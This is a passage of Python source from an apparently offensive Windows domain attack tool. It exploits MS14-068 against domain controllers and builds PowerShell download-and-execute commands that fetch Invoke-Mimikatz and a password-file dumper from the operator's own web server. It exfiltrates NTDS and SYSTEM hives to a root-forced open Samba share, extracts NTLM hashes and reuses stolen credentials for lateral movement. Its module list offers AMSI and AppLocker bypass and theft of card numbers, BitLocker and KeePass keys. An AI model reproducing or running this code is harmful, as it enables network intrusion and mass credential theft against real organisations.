     return \"9\"\n    if text==\"Oct\":\n        return \"10\"\n    if text==\"Nov\":\n        return \"11\"\n    if text==\"Dec\":\n        return \"12\"\n\ndef convertMthNum(text):\n    if text==\"1\":\n        return \"Jan\"\n    if text==\"2\":\n        return \"Feb\"\n    if text==\"3\":\n        return \"Mar\"\n    if text==\"4\":\n        return \"Apr\"\n    if text==\"5\":\n        return \"May\"\n    if text==\"6\":\n        return \"Jun\"\n    if text==\"7\":\n        return \"Jul\"\n    if text==\"8\":\n        return \"Aug\"\n    if text==\"9\":\n        return \"Sep\"\n    if text==\"10\":\n        return \"Oct\"\n    if text==\"11\":\n        return \"Nov\"\n    if text==\"12\":\n        return \"Dec\"\n\ndef setupSMBShare():\n    s=\"\"\"[global]\n        workgroup = MYGROUP\n        server string = Samba Server %v\n        netbios name = debian\n        security = user\n        map to guest = bad user\n        dns proxy = no\n\n        [guest]\n        force user = root\n        path = %s\n        browseable = yes\n        writable = yes\n        guest ok = yes\n        read only = no\n\n        [files]\n        force user = root\n        path = %t\n        browseable = yes\n        writable = yes\n        guest ok = yes\n        read only = no\n    \"\"\" \n    s=s.replace(\"%s\",origScriptPath+\"/loot\")\n    s=s.replace(\"%t\",origScriptPath+\"/modules\")\n    filename=\"/etc/samba/smb.conf\"    \n    target = open(filename, 'w')\n    target.write(s)\n    target.close()\n    cmd=\"service smbd restart\"\n    resultList = runCommand(cmd, shell = True, timeout = 120)\n\ndef testMS14_068(ip,domain,username,password,passwordHash):\n    #Setup SMB Share\n    tmpPassList=[]\n    tmpHashList=[]\n    domainShort,domainFull=reverseLookup(ip)\n    n = NetBIOS(broadcast=True, listen_port=0)\n    netbiosName=''\n    try:\n        netbiosName=n.queryIPForName(ip)[0]\n    except Exeception:\n        pass\n\n    print (setColor(\"\\nTesting MS14-068\", color=\"green\"))\n    #print (setColor(\"\\nTesting MS14-068\", bold, color=\"red\"))\n    dateTime1=str(checkRemoteTime(ip))\n    dateTime2=str(checkCurrentTime())\n\n    if compareTime(dateTime1,dateTime2)==True:\n        print \"[*] Time sync between host and remote server: \"+(setColor(\"OK\", bold, color=\"green\"))\n    else:\n        print \"[*] Time sync between host and remote server: \"+(setColor(\"Failed\", bold, color=\"red\"))\n        syncDateTime(dateTime1)\n    target_ip=ip\n    dc_ip=ip\n    address=netbiosName\n    tmpFoundCreds=[]    \n    if domain.lower()==domainFull.lower() or domain.lower()==domainShort.lower():\n        print \"adding: \"+username+\"\\t\"+password\n        tmpFoundCreds.append([username,password])\n    #print domainShort\n    #for x in userPassList:\n    #    if domainFull.lower() in str(x).lower():\n    #        tmpFoundCreds=x\n    if len(tmpFoundCreds)<1:\n        print \"[*] No domain credentials found to continue with MS14-068 test\"\n    if len(tmpFoundCreds)>0:\n        username=tmpFoundCreds[0][0]\n        password=tmpFoundCreds[0][1]\n        command=powershellPath+\" \"+powershellArgs+\" IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-Mimikatz.ps1\\'); Invoke-Mimikatz -DumpCreds\"\n        dumper=MS14_068(address,target_ip, username, password, domainFull, None, command, None, None, dc_ip)    \n        try:\n            dumper.exploit()\n            tmpPasswordList=parseMimikatzOutput(dumper.getOutput())\n            if len(tmpPasswordList)>0:\n                print \"\\nTesting Credentials\"\n                for y in tmpPasswordList:\n                    tmpdomain=y[0]\n                    tmpusername=y[1]\n                    tmppassword=y[2]\n                    tmppasswordHash=None\n                    tmpLoginOK,tmpAdminOK=testDomainCredentials(tmpusername,tmppassword,tmppasswordHash,dcList[0],tmpdomain,False)\n                    if tmpAdminOK==True:\n                        if y not in daPassList:\n                            daPassList.append(y)\n                        tmpPassList.append(y)  \n        except Exception:\n            pass\n    dumper=None\n    if len(tmpFoundCreds)>0:\n        username=tmpFoundCreds[0][0]\n        password=tmpFoundCreds[0][1]\n\n        command=powershellPath+\" \"+powershellArgs+\" IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Get-PasswordFile.ps1\\'); Get-PasswordFile '\\\\\\\\\"+myIP+\"\\\\guest'\"\n        dumper=MS14_068(address,target_ip, username, password, domainFull, None, command, None, None, dc_ip)    \n        try:\n            dumper.exploit()\n        except Exception as e:\n            print e\n            pass\n        dumper=None\n        if not os.path.exists(origScriptPath+\"/loot/system\") or not os.path.exists(origScriptPath+\"/loot/ntds\"):\n            print (setColor(\"[-]\", bold, color=\"red\"))+\" Unable to find NTDS.dll and SYSTEM hive\"\n            os._exit(1)\n        else:            \n            print (setColor(\"[+]\", bold, color=\"green\"))+\" Downloading NTDS.dll and SYSTEM hive\"            \n            print (setColor(\"[+]\", bold, color=\"green\"))+\" Converting NTDS.dll to NTLM hashes\"            \n            cmd=pathEsedb+\"/esedbexport -t /tmp/ \"+origScriptPath+\"/ntds\"\n            resultList = runCommand(cmd, shell = True, timeout = 120)\n            time.sleep(2)\n\n            outputFilename=\"/tmp/NT.out\"\n            cmd=\"python \"+pathNTDSExtract+\"/dsusers.py /tmp/ntds.export/datatable.3 /tmp/ntds.export/link_table.5 /tmp --passwordhashes --lmoutfile /tmp/LM.out --ntoutfile \"+outputFilename+\" --pwdformat john --syshive \"+origScriptPath+\"/system\"\n            resultList = runCommand(cmd, shell = True, timeout = 120)\n\n            if os.path.exists(outputFilename):\n                with open(outputFilename) as f:\n                    lines = f.read().splitlines()\n                    for x in lines:\n                        if x not in tmpHashList:\n                            tmpHashList.append(x)\n            if len(tmpHashList)>0:\n                if ip in uncompromisedHostList:\n                    uncompromisedHostList.remove(ip)\n                print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" List of NTLM Hashes\"            \n                for x in tmpHashList:\n                    tmpusername=x.split(\":\")[0]\n                    tmphash=\"aad3b435b51404eeaad3b435b51404ee:\"+(x.split(\":\")[1]).split(\"$\")[2]\n                    tmpuid=(x.split(\":\")[2]).split(\"-\")[7]\n                    print tmpusername+\":\"+str(tmpuid)+\":\"+tmphash+\":::\"\n                    if [ip,domain,tmpusername,tmphash] not in userHashList:\n                        userHashList.append([ip,domain,tmpusername,tmphash])\n                    if tmpusername.lower()==\"administrator\":\n                        if len(domain)<1:\n                            domain=\"WORKGROUP\"\n                        tmpHostList=[]\n                        for z in accessAdmHostList:\n                            tmpHostList.append(z[0])\n                        if ip not in tmpHostList:\n                            if [ip,domain,tmpusername,tmphash] not in accessAdmHostList:\n                                accessAdmHostList.append([ip,domain,tmpusername,tmphash])\n\n\n            #accessAdmHostList.append()\n    return tmpPassList,tmpHashList\n\ndef cardLuhnChecksumIsValid(card_number):\n    \"\"\" checks to make sure that the card passes a luhn mod-10 checksum \"\"\"\n    sum = 0\n    num_digits = len(card_number)\n    oddeven = num_digits & 1\n    for count in range(num_digits):\n        digit = int(card_number[count])\n        if not (( count & 1 ) ^ oddeven):\n            digit = digit * 2\n        if digit > 9:\n            digit = digit - 9\n        sum = sum + digit\n    return (sum % 10) == 0\n\ndef addPasswords(tmpip,tmpPasswordList):\n    for x in tmpPasswordList:\n        domainShort,domainFull=reverseLookup(tmpip)\n        tmpdomain=(domainFull).lower()\n        tmpusername=(x[1]).lower()\n        tmppassword=x[2]\n        if len(tmppassword)>0 and tmppassword!='(null':   \n            if [tmpip,tmpdomain,tmpusername,tmppassword] not in userPassList:\n                userPassList.append([tmpip,tmpdomain,tmpusername,tmppassword])\n\ndef addHashes(tmpip,tmpHashList):\n    #tmpdomain=getNetBiosName(tmpip)\n    #print tmpdomain    \n    for x in tmpHashList:\n        tmpusername=x.split(\":\")[0]\n        tmphash=x.split(\":\")[2]+\":\"+x.split(\":\")[3]\n        if \"\\\\\" in tmpusername: \n            tmpdomain=tmpusername.split(\"\\\\\")[0]\n            tmpusername=tmpusername.split(\"\\\\\")[1]   \n            if len(tmpdomain)<1:\n                tmpdomain='WORKGROUP'\n            #print \"domain : \"+tmpdomain\n            if [tmpip,tmpdomain,tmpusername,tmphash] not in userHashList:\n                userHashList.append([tmpip,tmpdomain,tmpusername,tmphash])\n        else:        \n            tmpdomain='WORKGROuP'\n            if tmpip not in dcList:        \n                if [tmpip,tmpdomain,tmpusername,tmphash] not in userHashList:\n                    userHashList.append([tmpip,tmpdomain,tmpusername,tmphash])\n            else:\n                domainShort,domainFull=reverseLookup(tmpip)\n                tmpdomain=domainFull\n                if [tmpip,tmpdomain,tmpusername,tmphash] not in userHashList:\n                    userHashList.append([tmpip,tmpdomain,tmpusername,tmphash])\n\ndef accessRemoteShare(targetIP,filePath,domain, username, password):\n\n    complete=False\n    status=False\n    while complete==False:\n        try:\n            client_machine_name='test'\n            conn = None            \n            conn = SMBConnection1(username,password,client_machine_name,targetIP,domain=domain,use_ntlm_v2=True,is_direct_tcp=True)\n            conn.connect(targetIP, 445)  \n            shareName=filePath.split(\"/\")[0]\n            subDirectory=filePath.replace(shareName,\"\")\n            conn.listPath(shareName, subDirectory)\n            conn = None\n            complete=True\n            status=True\n        except Exception as e:\n            if \"Unknown status value\" in str(e):\n                complete=False\n            else:\n                complete=True\n            status=False\n    return status\n\ndef my_tcp_server():\n    port=8000\n    server = ThreadingSimpleServer(('', port), SimpleHTTPRequestHandler)\n    # server = ThreadingSimpleServer(('', port), RequestHandler)\n    addr, port = server.server_address\n    #print(\"Serving HTTP on %s port %d ...\" % (addr, port))\n    try:\n        while 1:\n            sys.stdout.flush()\n            server.handle_request()\n    except KeyboardInterrupt:\n        print \"Finished\"\n\nparser = argparse.ArgumentParser(\n        prog='PROG',\n        formatter_class=argparse.RawDescriptionHelpFormatter,\n        description=('''\\\n'''))\nparser.add_argument(\"target\", nargs='*', type=str, help=\"The target IP(s), range(s) or file(s) containing a list of targets\")\nparser.add_argument(\"-d\", type=str, dest=\"domain\", help=\"Domain Name\")\nparser.add_argument(\"-u\", type=str, dest=\"username\", help=\"Username\")\nparser.add_argument(\"-p\", type=str, dest=\"password\", help=\"Password\")\nparser.add_argument(\"-s\", '--skip', action='store_true', help=\"Skip Lateral Movement/Privilege Escalation.  Only run POST exploitation modules\")\nparser.add_argument('-L', '--list-modules', action='store_true', help='List available modules')\nparser.add_argument('-amsi', action='store_true', help='Enable AMSI Bypass')\nparser.add_argument('-bypass', action='store_true', help='Enable AppLocker Bypass')\nparser.add_argument('-obfs', action='store_true', help='Enable Powershell Obfuscation')\nmcgroup = parser.add_mutually_exclusive_group()\nmcgroup.add_argument(\"-M\", \"--module\", metavar='MODULE', help='Payload module to use')\nparser.add_argument('-o', metavar='MODULE_OPTION', nargs='+', default=[], dest='module_options', help='Payload module options')\nparser.add_argument(\"-D\", \"--debug\", action='store_true', help=\"Verbose mode\")\nif len(sys.argv) == 1:\n        parser.print_help()\n        sys.exit(1)\nargs = parser.parse_args()\nif args.list_modules:\n    tmpResultList=[]\n    tmpResultList.append(['pan','Dump and search PAN numbers from disks and memory'])\n    tmpResultList.append(['shares','Find the correct account credentials to access shares/folders'])\n    tmpResultList.append(['files','Find interesting files (UltraVNC, Unattend.xml, KeePass Files, Web.config, Filezilla, *passwords* docs)'])\n    tmpResultList.append(['reg','Find interesting registry keys (WinVNC, SNMP, Putty)'])\n    tmpResultList.append(['bitlocker','Find BitLocker keys'])\n    tmpResultList.append(['truecrypt','Find Truecrypt Master keys'])\n    tmpResultList.append(['keepass','Find Keepass Passwords'])\n    tmpResultList.append(['mimikatz','Run Mimikatz'])\n    tmpResultList.append(['tokens','Enumerate Tokens'])\n    tmpResultList.append(['vuln','Find Hosts Vulnerable to MS08-067 and MS17-010'])\n    tmpResultList.append(['route','Find Routes'])\n    tmpResultList.append(['mssqlauto','Bruteforce MSSQL Accounts, Dump Hashes and Find Interesting Data'])\n    tmpResultList.append(['mssqlbrute','Bruteforce MSSQL \\'sa\\' Account'])\n    tmpResultList.append(['mssqldata','Find Interesting Data in MSSQL Databases'])\n    tmpResultList.append(['mssqlhash','Dump MSSQL Password Hashes'])\n    tmpResultList.append(['wdigest','Create the UseLogonCredentials key'])\n    #tmpResultList.append(['rdp','Enable Remote Desktop (RDP) on hosts'])\n    #tmpResultList.append(['apps','List installed applications on hosts'])\n    print tabulate(tmpResultList)\n    os._exit(0)\n\nsetupSMBShare()\nif args.bypass:\n    applockerBypass=True\nif len(args.target)<1:\n print \"[!] Please set a target\"\n sys.exit()\nif args.amsi:\n    amsiMode=True\nif args.obfs:\n    obfuscatedMode=True\nif args.skip:\n    skipMode=True\nif args.debug:\n    debugMode=True\nif args.domain:\n    domain=args.domain\nelse:\n    domain=''\nif args.username:\n    username=args.username\nif args.password:\n    password=args.password\n#if not args.domain or not args.username or not args.password:\nif not args.username or not args.password:\n    print (setColor(\"[!]\", bold, color=\"red\"))+\" Please provide the domain, username and password\"\n    sys.exit()\n\nif os.path.exists(\"secrets.ntds\"):\n    os.remove(\"secrets.ntds\")\nif os.path.exists(\"secrets.sam\"):\n    os.remove(\"secrets.sam\")\n\ninputStr=args.target[0]\nif \"/\" in inputStr:\n    for x in IPNetwork(inputStr):\n        if str(x) not in ipList:\n            if str(x) not in ipList: \n                ipList.append(str(x))\nelse:\n    if os.path.exists(inputStr):\n        with open(inputStr) as f:\n            lines = f.read().splitlines()\n            for x in lines:\n                if \"/\" in x:\n                    for y in IPNetwork(x):\n                        if str(y) not in ipList:\n                            if str(y) not in ipList:\n                                ipList.append(str(y))\n                else:\n                    if x not in ipList:\n                        ipList.append(x)\n    else:\n        ipList.append(inputStr)\n\ncmd=\"rm -rf /tmp/.export\"\nrunCommand(cmd, shell = True, timeout = 30)\ncmd=\"rm -rf /tmp/ntds.export\"\nrunCommand(cmd, shell = True, timeout = 30)\ncmd=\"rm \"+os.getcwd()+\"/system\"\nrunCommand(cmd, shell = True, timeout = 30)\ncmd=\"rm \"+os.getcwd()+\"/NTDS\"\nrunCommand(cmd, shell = True, timeout = 30)\n\npasswordHash=None\n\nportList=[]\nportList.append(\"389\")\nportList.append(\"445\")\nportList.append(\"1433\")\nportList.append(\"3389\")\n\nipListStr=\", \".join(ipList)\nprint (setColor(\"[*]\", bold, color=\"green\"))+\" Scanning Target Network\"\nmyIP=get_ip_address()\n\nweb_dir = os.getcwd()+\"/modules\"\nos.chdir(web_dir)\nthreading.Thread(target=my_tcp_server).start()\n\n#updateMimiStaging()\n\nimport resource\nresource.setrlimit(resource.RLIMIT_NOFILE, (1024, 3000))\nscreenLock = threading.Semaphore(value=3)\nfor port in portList:\n    for x in ipList:\n        scanThread(x, port)\nfor x in liveList:\n    hostNo=x[0]\n    portNo=x[1]\n    if portNo=='1433':\n        if hostNo!=myIP:\n\t    hostNo=hostNo.strip()\n            mssqlList.append(hostNo)\n    if portNo=='3389':\n\thostNo=hostNo.strip()\n        rdpList.append(hostNo)\n    if portNo=='445':\n        if hostNo not in dcList:\n            if hostNo!=myIP:\n\t\thostNo=hostNo.strip()\n                nbList.append(hostNo)\n    if portNo=='389':\n\thostNo=hostNo.strip()\n        dcList.append(hostNo)\n        if hostNo in nbList:\n            nbList.remove(hostNo)\nif len(dcList)<1 and len(rdpList)<1 and len(nbList)<1:\n    print \"[+] No Domain Controllers/NetBIOS/RDP ports detected on target hosts\"\n    os._exit(0)\nelse:\n    for x in dcList:\n        print x+\" [DC]\"\n        if x not in uncompromisedHostList:\n            uncompromisedHostList.append(x)\n    for x in nbList:\n        print x+\" [NBNS]\"\n        if x not in uncompromisedHostList:\n            uncompromisedHostList.append(x)\n    for x in rdpList:\n        print x+\" [RDP]\"        \n    for x in mssqlList:\n        print x+\" [MSSQL]\"        \n    print \"\\n\"\n\nisDomainAccount=False\nlogging.getLogger().setLevel(logging.ERROR)\nlogging.disabled = False\npasswordHash=None\n\ncleanUp()\nfor x in nbList:\n    #testAccount\n    #tmpLoginOK,tmpAdminOK=testDomainCredentials(username,password,passwordHash,x,domain)\n    #if tmpAdminOK==True:\n    if testAccount(x, domain, username, password, passwordHash)==True:\n        if [x, domain, username, password] not in accessAdmHostList:\n            accessAdmHostList.append([x, domain, username, password])                            \nfor x in dcList:\n    if testAccount(x, domain, username, password, passwordHash)==True:\n        if [x, domain, username, password] not in accessAdmHostList:\n            accessAdmHostList.append([x, domain, username, password])                                    \n    #tmpLoginOK,tmpAdminOK=testDomainCredentials(username,password,passwordHash,x,domain)\n    #if tmpAdminOK==True:\n    #    if [x, domain, username, password] not in accessAdmHostList:\n    #        accessAdmHostList.append([x, domain, username, password])                            \n#print \"\\n\"\n\nif skipMode==False:\n    if len(dcList)>0:    \n        isDA=getDomainAdminUsers(username,password,dcList[0])\n    if domain.lower()==\"workgroup\":\n        if len(dcList)>0:\n            ip=dcList[0]\n            #print (setColor(\"\\nChecking SYSVOL for Credentials\", color=\"green\"))\n            mountSysvol(username,password)\n\n        tmpHostList=[]\n        for y in accessAdmHostList:\n            tmpHostList.append(y[0])\n\n        if len(nbList)>0:\n            for ip in nbList:\n                if ip in tmpHostList:\n                    domain=domain.lower()\n                    username=username.lower()\n                    if [ip,domain,username,password] not in userPassList:\n                        userPassList.append([ip,domain,username,password])\n                    tmpPasswordList=runMimikatz(ip,domain,username,password,passwordHash)\n                    if len(tmpPasswordList)>0:\n                        for y in tmpPasswordList:\n                            if y not in userPassList:\n                                userPassList.append(y)            \n                    if len(tmpPasswordList)>0:\n                        print \"\\n\"\n                    print (setColor(\"[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+ip                    \n                    tmpHashList=dumpDCHashes(ip,domain,username,password,passwordHash)\n                    if len(tmpHashList)>0:\n                        addHashes(ip,tmpHashList)\n                        if ip in uncompromisedHostList:\n                            uncompromisedHostList.remove(ip)                            \n                    analyzeHashes(tmpHashList)\n\n                    if len(dcList)>0:\n                        getDomainAdminUsers(username,password,dcList[0])\n                        domainShort,domainFull=reverseLookup(dcList[0])\n                        for x in tmpPasswordList:\n                            tmpdomain1=(x[1]).lower()\n                            tmpusername1=(x[2]).lower()\n                            tmppassword1=x[3]\n                            tmppasswordhash1=None\n                            if tmpdomain1==domainFull.lower() or tmpdomain1==domainShort.lower():\n                                if tmpusername1 in domainAdminList and dcCompromised==False:\n                                    print (setColor(\"[+]\", bold, color=\"green\"))+\" Found Domain Admin Credentials in Memory on Host: \"+ip                    \n                                    getDomainAdminUsers(tmpusername1,tmppassword1,dcList[0])\n                                    tmpPasswordList=runMimikatz(dcList[0],tmpdomain1,tmpusername1,tmppassword1,tmppasswordhash1)\n                                    if len(tmpPasswordList)>0:\n                                        for y in tmpPasswordList:\n                                            if y not in userPassList:\n                                                userPassList.append(y)            \n                                    if len(tmpPasswordList)>0:\n                                        print \"\\n\"\n                                    print (setColor(\"[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+ip                    \n                                    tmpHashList=dumpDCHashes(ip,domain,username,password,passwordHash)\n                                    if len(tmpHashList)>0:\n                                        addHashes(ip,tmpHashList)\n                                        if ip in uncompromisedHostList:\n                                            uncompromisedHostList.remove(ip)                            \n                                    analyzeHashes(tmpHashList)\n                                    dcCompromised=True\n\n                    if optionTokenPriv==True:\n                        if ip not in dcList and dcCompromised==False:\n                            print (setColor(\"\\nEnumerating Tokens and Attempting Privilege Escalation\", bold, color=\"green\"))\n                            tokensPriv(ip,domain,username,password,passwordHash)\n\n    else:\n        mountSysvol(username,password)\n        for ip in dcList:\n            tmpHostList=[]\n            for y in accessAdmHostList:\n                tmpHostList.append(y[0])\n            if ip in tmpHostList:\n                domain=domain.lower()\n                username=username.lower()\n                if [ip,domain,username,password] not in userPassList:\n                    userPassList.append([ip,domain,username,password])\n                if dcCompromised==False:\n                    tmpPasswordList=runMimikatz(ip,domain,username,password,passwordHash)\n                    for y in tmpPasswordList:\n                        if y not in userPassList:\n                            userPassList.append(y)            \n                    if len(tmpPasswordList)>0:\n                        print \"\\n\"\n                    print (setColor(\"[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+ip\n                    tmpHashList=dumpDCHashes(ip,domain,username,password,passwordHash)\n                    if len(tmpHashList)>0:\n                        addHashes(ip,tmpHashList)\n                        if ip in uncompromisedHostList:\n                            uncompromisedHostList.remove(ip)\n                        for ip in dcList:\n                            tmpHostList=[]\n                            for z in accessAdmHostList:\n                                tmpHostList.append(z[0])\n                            if ip not in tmpHostList:\n                                if [ip, domain, tmpusername, tmppassword] not in accessAdmHostList:\n                                    accessAdmHostList.append([ip, domain, tmpusername, tmppassword])\n                    analyzeHashes(tmpHashList)\n                    if optionTokenPriv==True:\n                        if ip not in dcList and dcCompromised==False:\n                            print (setColor(\"\\nEnumerating Tokens and Attempting Privilege Escalation\", bold, color=\"green\"))\n                            tokensPriv(ip,domain,username,password,passwordHash)\n\n        for ip in nbList:\n            tmpHostList=[]\n            for y in accessAdmHostList:\n                tmpHostList.append(y[0])\n            if ip in tmpHostList:\n                domain=domain.lower()\n                username=username.lower()\n                if [ip,domain,username,password] not in userPassList:\n                    userPassList.append([ip,domain,username,password])\n\n                tmpPasswordList=runMimikatz(ip,domain,username,password,passwordHash)\n                for y in tmpPasswordList:\n                    if y not in userPassList:\n                        userPassList.append(y)      \n                if len(tmpPasswordList)>0:\n                    print \"\\n\"\n\n                print (setColor(\"[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+ip\n                tmpHashList=dumpDCHashes(ip,domain,username,password,passwordHash)\n                if len(tmpHashList)>0:\n                    addHashes(ip,tmpHashList)\n                    if ip in uncompromisedHostList:\n                        uncompromisedHostList.remove(ip)\n                analyzeHashes(tmpHashList)\n                for y in userPassList:\n                    if len(dcList)>0 and len(domainAdminList)<1:\n                        tmpdomain=y[1]\n                        tmpusername=y[2]\n                        tmppassword=y[3]\n                        getDomainAdminUsers(tmpusername,tmppassword,dcList[0])\n                        dcDomainNameList=reverseLookup(dcList[0])\n                domainShort,domainFull=reverseLookup(ip)\n                if len(dcList)>0:\n                    for y in userPassList:\n                        if dcCompromised==False:\n                            tmpdomain=(y[1]).lower()\n                            tmpusername=y[2]\n                            tmppassword=y[3]\n                            tmppasswordHash=None\n                            if domainShort.lower()==tmpdomain or domainFull.lower()==tmpdomain:\n                                tmpLoginOK,tmpAdminOK=testDomainCredentials(tmpusername,tmppassword,tmppasswordHash,dcList[0],domainFull,False)        \n                                if tmpAdminOK==True:\n                                    tmpPasswordList=runMimikatz(dcList[0],domainFull,tmpusername,tmppassword,tmppasswordHash)\n                                    for y in tmpPasswordList:\n                                        if y not in userPassList:\n                                            userPassList.append(y)      \n                                    if len(tmpPasswordList)>0:\n                                        print \"\\n\"\n                                    print (setColor(\"[+]\", bold, color=\"green\"))+\" Dumping Hashes from Domain Controller: \"+dcList[0]\n                                    tmpHashList=dumpDCHashes(dcList[0],domainFull,tmpusername,tmppassword,tmppasswordHash)\n                                    if len(tmpHashList)>0:\n                                        addHashes(dcList[0],tmpHashList)\n                                        if dcList[0] in uncompromisedHostList:\n                                            uncompromisedHostList.remove(dcList[0])\n                                    analyzeHashes(tmpHashList)\n                                    dcCompromised=True\n\n                if optionTokenPriv==True:\n                    if ip not in dcList and dcCompromised==False:\n                        print (setColor(\"\\nEnumerating Tokens and Attempting Privilege Escalation\", bold, color=\"green\"))\n                        tokensPriv(ip,domain,username,password,passwordHash)\n    '''\n    if len(accessAdmHostList):\n        print \"\\nADMIN$ Access on the Below Hosts\"\n    print tabulate(accessAdmHostList)\n    if len(accessOKHostList):\n        print \"\\nCredentials Valid on the Below Hosts\"\n    print tabulate(accessOKHostList)\n    '''\n\n    if len(dcList)>0:\n        for ip in dcList:\n            if isDA==True and dcCompromised==False:\n                tmpPasswordList=runMimikatz(ip,domain,username,password,passwordHash)\n                for y in tmpPasswordList:\n                    if y not in userPassList:\n                        userPassList.append(y)   \n        if isDA==False and dcCompromised==False:      \n            #if domain==None or len(domain)<1:\n            #    domain=\"WORKGROUP\"  \n            #print (setColor(\"\\nChecking SYSVOL for Credentials\", color=\"green\"))\n            #mountSysvol(username,password)\n            if optionMS14068==True:\n                tmpPassList,tmpHashList=testMS14_068(ip,domain,username,password,passwordHash)\n                if len(tmpPassList)>0 or len(tmpHashList)>0:\n                    for x in tmpHashList:\n                        hashList.append(x)\n                    for x in tmpPassList:\n                        passList.append(x)\n\n                    for x in tmpPassList:\n                        tmpusername=x[1]\n                        tmppassword=x[2]\n                        tmppasswordHash=None\n                        if dcCompromised==False:\n                            print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Dumping Hashes from Domain Controller: \"+dcList[0]\n                            tmpHashList=dumpDCHashes(dcList[0],domain,tmpusername,tmppassword,tmppasswordHash)\n                            if len(tmpHashList)>0:\n                                addHashes(dcList[0],tmpHashList)\n                                if dcList[0] in uncompromisedHostList:\n                                    uncompromisedHostList.remove(dcList[0])\n                                for dc in dcList:\n                                    tmpHostList=[]\n                                    for z in accessAdmHostList:\n                                        tmpHostList.append(z[0])\n                                    if dc not in tmpHostList:\n                                        if [dc, domain, tmpusername, tmppassword] not in accessAdmHostList:\n                                            accessAdmHostList.append([dc, domain, tmpusername, tmppassword])\n                                dcCompromised=True\n                            analyzeHashes(tmpHashList)\n\n    else:        \n        for ip in nbList:              \n            tmpFound=False\n            tmpLoginOK,tmpAdminOK=testDomainCredentials(username,password,passwordHash,ip,domain,False)\n            if tmpLoginOK==True:\n                domain=domain.lower()\n                username=username.lower()\n                if [ip,domain,username,password] not in userPassList:\n                    userPassList.append([ip,domain,username,password])\n            if tmpAdminOK==True:\n                tmpPasswordList=runMimikatz(ip,domain,username,password,passwordHash)\n                for y in tmpPasswordList:\n                    if y not in userPassList:\n                        userPassList.append(y)     \n                print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+ip\n                tmpHashList=dumpDCHashes(ip,domain,username,password,passwordHash)\n                if len(tmpHashList)>0:\n                    addHashes(ip,tmpHashList)\n                    if ip in uncompromisedHostList:\n                        uncompromisedHostList.remove(ip)\n                    dcCompromised=True\n                analyzeHashes(tmpHashList)\n\n                if optionTokenPriv==True:\n                    if ip not in dcList and dcCompromised==False:\n                        print (setColor(\"\\nEnumerating Tokens and Attempting Privilege Escalation\", bold, color=\"green\"))\n                        tokensPriv(ip,domain,username,password,passwordHash)\n\n    if len(uncompromisedHostList)>0 and len(userPassList)>0:\n        print (setColor(\"\\nReusing Credentials and Hashes For Lateral Movement in the Network\", bold, color=\"green\"))\n    complete=False\n    complete1=False\n    lastCount=0\n    testedHostList=[]\n    while complete==False:\n        if len(uncompromisedHostList)<1:\n            complete=True\n        else:\n            while complete1==False:\n                for y in uncompromisedHostList:            \n                    if len(userPassList)>0:\n                        for x in userPassList:\n                            for z in uncompromisedHostList:\n                                tmpip=z\n                                tmpdomain=(x[1]).lower()\n                                tmpusername=((x[2]).lower()).strip()\n                                tmppassword=x[3]\n                                tmppasswordHash=None\n                                #if (tmpusername.lower()).strip()==\"administrator\":\n                                if len(tmppassword)>0 and tmppassword!='(null)' and tmpusername!=\"guest\":\n                                    if tmpip not in compromisedHostList:\n    \n                                            testedHostList.append([tmpip,tmpusername,tmppassword])\n                                            tmpLoginOK,tmpAdminOK=testDomainCredentials(tmpusername,tmppassword,tmppasswordHash,tmpip,tmpdomain,False)\n                                            if tmpLoginOK==False and tmpAdminOK==False:\n                                                testedHostList.append([tmpip,tmpusername,tmppassword])\n                                            if tmpLoginOK==True:\n                                                if [tmpip,domain,username,password] not in userPassList:\n                                                    userPassList.append([tmpip,domain,username,password])\n                                            if tmpAdminOK==True:   \n                                                tmpPasswordList=runMimikatz(tmpip,tmpdomain,tmpusername,tmppassword,tmppasswordHash)\n                                                for z in tmpPasswordList:\n                                                    if z not in userPassList:\n                                                        userPassList.append(z)                        \n                                                print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+tmpip                \n                                                tmpHashList=dumpDCHashes(tmpip,tmpdomain,tmpusername,tmppassword,tmppasswordHash)\n                                                if len(tmpHashList)>0:\n                                                    addHashes(tmpip,tmpHashList)\n                                                    if tmpip in dcList:\n                                                        dcCompromised=True\n                                                    if tmpip in uncompromisedHostList:\n                                                        uncompromisedHostList.remove(tmpip)\n                                                if optionTokenPriv==True and dcCompromised==False:\n                                                    if tmpip not in dcList:\n                                                        print (setColor(\"\\nEnumerating Tokens and Attempting Privilege Escalation\", bold, color=\"green\"))\n                                                        tokensPriv(tmpip,tmpdomain,tmpusername,tmppassword,tmppasswordHash)\n                                                if tmpip not in compromisedHostList:\n                                                    compromisedHostList.append(tmpip)       \n\n                    if len(userHashList)>0:\n                        for x in userHashList:\n                            for z in uncompromisedHostList:\n                                tmpip=z\n                                tmpdomain=(x[1]).lower()\n                                tmpusername=(x[2]).lower()\n                                tmppasswordHash=x[3]\n                                tmppassword=None        \n                                if tmpip not in compromisedHostList:\n                                    tmpLoginOK,tmpAdminOK=testDomainCredentials(tmpusername,tmppassword,tmppasswordHash,tmpip,tmpdomain,False)                    \n                                    if tmpLoginOK==True:\n                                        if [tmpip,domain,username,password] not in userPassList:\n                                            userPassList.append([tmpip,domain,username,password])\n                                    if tmpAdminOK==True:\n                                        tmpPasswordList=runMimikatz(tmpip,tmpdomain,tmpusername,tmppassword,tmppasswordHash)\n                                        for y in tmpPasswordList:\n                                            tmpdomain1=y[1]\n                                            tmpusername1=y[2]\n                                            tmppassword1=y[3]\n                                            tmppasswordHash1=None\n                                            tmpLoginOK1,tmpAdminOK1=testDomainCredentials(tmpusername1,tmppassword1,tmppasswordHash1,tmpip,tmpdomain1,False)                    \n                                            if tmpLoginOK1==True:\n                                                if y not in userPassList:\n                                                    userPassList.append(y)                        \n\n                                        print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+tmpip                \n                                        tmpHashList=dumpDCHashes(tmpip,tmpdomain,tmpusername,tmppassword,tmppasswordHash)\n                                        if len(tmpHashList)>0:\n                                            addHashes(tmpip,tmpHashList)\n                                            